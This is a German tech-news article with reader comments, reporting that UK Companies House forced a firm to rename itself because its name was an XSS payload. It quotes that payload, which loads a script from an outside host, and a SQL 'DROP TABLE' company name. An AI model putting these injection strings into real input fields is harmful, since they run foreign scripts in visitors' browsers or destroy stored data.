HTML: Firmenname wegen Sicherheitslücke untersagt

Eine britische Firma musste ihren Namen ändern, weil er Code in Webseiten injizieren konnte.

Artikel veröffentlicht am ,
Quellcode einer Webseite
Quellcode einer Webseite (Bild: Pexels/Pixabay)

Die britische Behörde Companies House, die für das dortige Handelsregister zuständig ist, hat eine Firma gezwungen, ihren Namen zu ändern, da dieser ein Sicherheitsrisiko darstellen kann. Der Firmenname bestand aus HTML-Code, der wie ein klassischer Cross-Site-Scripting-Angriff (XSS) aufgebaut war und das Ausführen von Javascript-Code im Kontext einer Webseite ermöglichen konnte - darunter die Webseite der britischen Behörde.

Stellenmarkt
  1. Inbetriebnahme Koordinator (m/w/d) für Software
    Dürr Systems AG, Bietigheim-Bissingen
  2. SAP CS Berater (m/w/x)
    über duerenhoff GmbH, Hamburg
Detailsuche

Er habe den Firmennamen nicht etwa gewählt, um die Webseite des Companies House anzugreifen, vielmehr hielt er ihn für "einen lustigen, verspielten Namen" für sein Beratungsunternehmen, erklärte der Firmengründer der britischen Zeitung Guardian. Das kann man sich bei dem ursprünglichen Firmennamen aber fast nicht vorstellen (Name zum Schutz mit Klammern):

"><[SCRIPT] SRC[=]HTTPS://MJT.XSS.HT> LTD

Golem Akademie
  1. Elastic Stack Fundamentals - Elasticsearch, Logstash, Kibana, Beats
    26.-28. Oktober 2021, online
  2. IT-Sicherheit für Webentwickler
    2.-3. November 2021, online
  3. Masterclass: Data Science mit Pandas & Python
    22.-23. November 2021, online
Weitere IT-Trainings

Wird der HTML-Code, nichts anderes ist der Firmenname, nicht ordentlich validiert und in einem HTML-Element in einer Webseite ausgegeben, wird ein Skript von der URL im Firmennamen im Kontext der Webseite ausgeführt. Das hinterlegte Skript habe nur eine harmlose Warnung ausgegeben, schreibt der Guardian. Allerdings hätte es auch zu einem späteren Zeitpunkt für Angriffe genutzt werden können.

Nun wurde die Firma in "That Company whose Name used to contain HTML Script Tags LTD" (zu Deutsch: die Firma, deren Name früher HTML-Script-Tags enthielt LTD) umbenannt. Es ist nicht das erste Mal, dass ein Firmenname Code enthält, so sollte der Firmenname "; DROP TABLE "COMPANIES";-- LTD" mittels eines SQL-Befehls Inhalte der Datenbank löschen. Allerdings wurden die Firmen laut dem Guardian nicht zu einer Namensänderung gezwungen. Auf der Webseite der Behörde Companies House werde statt des Namens schlicht "Name der Firma auf Anfrage erhältlich" ausgegeben.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed


Tubes 16. Nov 2020

Die bessere Frage lautet, seit wann nicht mehr?

MountWalker 12. Nov 2020

Doch, genau das und wäre das nicht so, würdest du heute Protoindoeuropäisch* reden und...

mtr (golem.de) 10. Nov 2020

Hallo, Danke für den Hinweis. Ich hatte das extra über HTML-Entities eingebaut, damit...

TurbinenBewunderer 10. Nov 2020

Schon lustig. Die trauen wohl den eigenen Entwicklern nicht.

smonkey 10. Nov 2020

Tatsächlich. Dann ist es zumindest common case.



Aktuell auf der Startseite von Golem.de
Gaming und Inklusion
Schnelles Tastendrücken heißt Game Over

Körperlich beeinträchtigte Menschen haben es nicht leicht in Games. Dabei wäre es möglich, Videospiele inklusiver zu machen. Das erkennt langsam auch die Industrie.
Ein Bericht von Denis Gießler

Gaming und Inklusion: Schnelles Tastendrücken heißt Game Over
Artikel
  1. Google: Chrome testet Rust und sicheres C++
    Google
    Chrome testet Rust und sicheres C++

    Die Mehrheit der schweren Sicherheitslücken in Chrome wird durch Speicherfehler verursacht. Das Team sucht nun nach weitgehenden Lösungen.

  2. Datenleck: Daten von 106 Millionen Thailand-Reisenden geleakt
    Datenleck
    Daten von 106 Millionen Thailand-Reisenden geleakt

    In einer ungeschützten Datenbank fanden sich die Daten der Thailand-Reisenden aus den letzten zehn Jahren - inklusive Reisepassnummern.

  3. Apple: Aktuelle iTunes-Version läuft unter Windows vielfach nicht
    Apple
    Aktuelle iTunes-Version läuft unter Windows vielfach nicht

    Vorsicht vor der Installation von iTunes 12.12: Die aktuelle Version funktioniert auf deutschen Windows-Rechnern nicht mehr.

Du willst dich mit Golem.de beruflich verändern oder weiterbilden?
Zum Stellenmarkt
Zur Akademie
Zum Coaching
  • Schnäppchen, Rabatte und Top-Angebote
    Die besten Deals des Tages
    Daily Deals • Black Week bei NBB: Bis 50% Rabatt (u. a. MSI 31,5" Curved WQHD 165Hz 350€) • Thermaltake Level 20 RS ARGB Tower 99,90€ • Gran Turismo 7 25th Anniversary PS4/PS5 vorbestellbar 99,99€ • Alternate-Deals (u. a. Cooler Master Gaming-Tastatur 59,90€) • PS5 bei Amazon zu gewinnen [Werbung]
    •  /